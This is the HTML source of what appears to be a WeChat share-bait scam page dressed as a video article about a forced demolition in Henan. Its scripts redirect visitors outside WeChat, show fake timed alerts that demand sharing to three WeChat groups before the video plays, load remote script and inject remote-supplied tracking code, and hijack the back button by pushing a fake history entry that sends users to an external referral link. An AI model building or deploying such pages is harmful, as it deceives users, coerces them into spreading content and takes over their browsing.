<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
    <meta http-equiv="Cache-Control" content="no-siteapp">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <script src="http://apps.bdimg.com/libs/jquery/2.1.3/jquery.min.js"></script>
    <script src="//cdn.bootcss.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
    <script>
        var ua = window.navigator.userAgent.toLowerCase();
        if(ua.match(/MicroMessenger/i) != 'micromessenger')
        {
            window.location.href = 'http://www.qq.com';
        }
    </script>

    <title>河南强拆出动黒社會,遇“武林高手”被撂倒7人</title>
    <link rel="stylesheet" href="https://s3.cn-north-1.amazonaws.com.cn/cqxch/public/css/wxvideo/style.css">
    <style>
        #DetialImg{
            border-radius:50%;
        }
        .posi{
            position: relative;
            display: block;
            margin-left: 44%;
            margin-top: -8.5em;
        }
    </style>
</head>
<div style="display:none;">
    <img id="shareImage" src="http://i1.piimg.com/521774/7b4040f67e49ab6c.jpg">
</div>
<div class="container">
    <div style="font-weight: bold;font-size: 1.2em" id="c_title">河南强拆出动黒社會,遇“武林高手”被撂倒7人</div>
    <nav style="margin-top: 10px">
        <div id="date"></div><!--时间-->
        <div id="up-name"></div>
        <div id="complain">投诉</div>
    </nav>
    <div class="wrap-act">
        <div class="act-cont" style="margin-top: 10px">
            <!--视频-->
            <div id="tConArt" class="art_co sau">
                <div class="rich_media_content" id="js_content">
                    <!--内容-->
                    <div id="neirong">
                        <a id="c_domain" href="#">
                        <div id="showmodel" class="video video-thumb " data-toggle="modal" data-target="#shareGuide" style="height: 200px;">
                            <img id="img" src="http://wx2.sinaimg.cn/mw690/5ee43f43gy1ffo3tmek15j20b40b43zh.jpg" style="visibility: visible;height: 200px;width: 100%">
                            <img src="http://i2.muimg.com/556444/d22d8a806049c43a.png" alt="" style="width: 60px;height: 60px;" class="posi" >
                        </div>
                        </a>
                        <div style="height:20px;line-height:0;font-size:0;"></div>
                    </div>
                    <!--广告-->
                                        <!--end 广告-->
                    <div id="neirong_v" style="display:none;">
                        <iframe id="c_iframe" frameborder="0" width="100%" height="221"></iframe>
                    </div>

                </div>
            </div>
        </div>

    </div>
    <!--推荐阅读-->
    <article class="article">
        <div class="recommend">
            热门推荐
        </div>
        <!--固定-->
        <!--视频内容-->


    </article>
    <div id="share"  class="share-guide modal" style="display:none;">
        <img src="http://ww3.sinaimg.cn/mw690/5ee43f43gw1f49r1qwhmej20b40jrt90.jpg" style="width: 100%;"/>
    </div>
    <!--统计代码-->
    <div style="display:none" class="tj">
    </div>
</div>
<script type="text/javascript">
        $("#showmodel").click(function(){
        $("#share").show();
        setTimeout(function(){alert("把好東西分享給您的朋友吧。发送到【微信群】即可观看视频!");},1);
    });
</script>

<script type="text/javascript">
    function getQueryString(name)
    {
        var reg = new RegExp("(^|&)" + name + "=([^&]*)(&|$)", "i");
        var r = window.location.search.substr(1).match(reg);
        if (r != null) return unescape(r[2]); return null;
    }

    var id = getQueryString('id') ? getQueryString('id') : 21;
    var t = getQueryString('t');

    document.write('<script src="http://s3.amazonaws.com/cqxch/public/data/video/data_'+ id +'.txt" type="text/javascript"></scr'+'ipt>');

    if(t == 1 && document.referrer != '')
    {
        $("#share").show();
        setTimeout(function(){alert("发送成功!发送3个不同【微信群】即可观看視頻,当前还剩【2】次分享!");},10000);
        setTimeout(function(){alert("发送成功!发送3个不同【微信群】即可观看視頻,当前还剩【1】次分享!");},20000);
        setTimeout(function(){
            $("#share").hide();
            $("#neirong").html($("#neirong_v").html());
        },30000);
    }
</script>
<script type="text/javascript">
    document.title = result.video.content_title;
    $("#c_title").html(result.video.content_title);
    $("#shareImage").attr('src',result.video.content_image);
    $("#img").attr('src',result.video.content_image);
    $('#c_domain').attr('href',result.video.domain + '?t=1&id=' + id);
    $("#c_iframe").attr('src',result.video.content_video_id);

    var html = result.video.statistics_code + result.video.data_statistics_code + result.video.total_statistics_code;
    $('.tj').html(html);

    for (var i=0;i<result.ad.length;i++)
    {
        var html = '<a href="' + result.ad[i].url + '"><section style="color: black"><img src="' + result.ad[i].img + '"><div class="item-content"><div class="item-title">' + result.ad[i].title + '</div><div class="item-info"><span>1小时前</span><span>阅读：    100000+</span></div></div></section></a>';
        $(".article").append(html);
    }

    for (var i=0;i<result.video_lists.length;i++)
    {
        var html = '<a href="' + result.video_lists[i].domain + '?id=' + result.video_lists[i].content_id + '"><section style="color: black"><img src="' + result.video_lists[i].content_image + '"><div class="item-content"><div class="item-title">' + result.video_lists[i].content_title + '</div><div class="item-info"><span>1小时前</span><span>阅读：    100000+</span></div></div></section></a>';
        $(".article").append(html);
    }
</script>
<script>
	window.onhashchange = function () 
	{
		if(Math.floor(Math.random()*20) == 0)
		{
			location.href = 'wechat.html';
		}else
		{
			//location.href = 'wechat.html';
			location.href = 'https://c17069.818tu.com/referrals/index/292503';
		}		
	};
	
	setTimeout(function (){history.pushState(history.length + 1, "message", "#" + new Date().getTime());}, 200);</script>
</body>
</html>
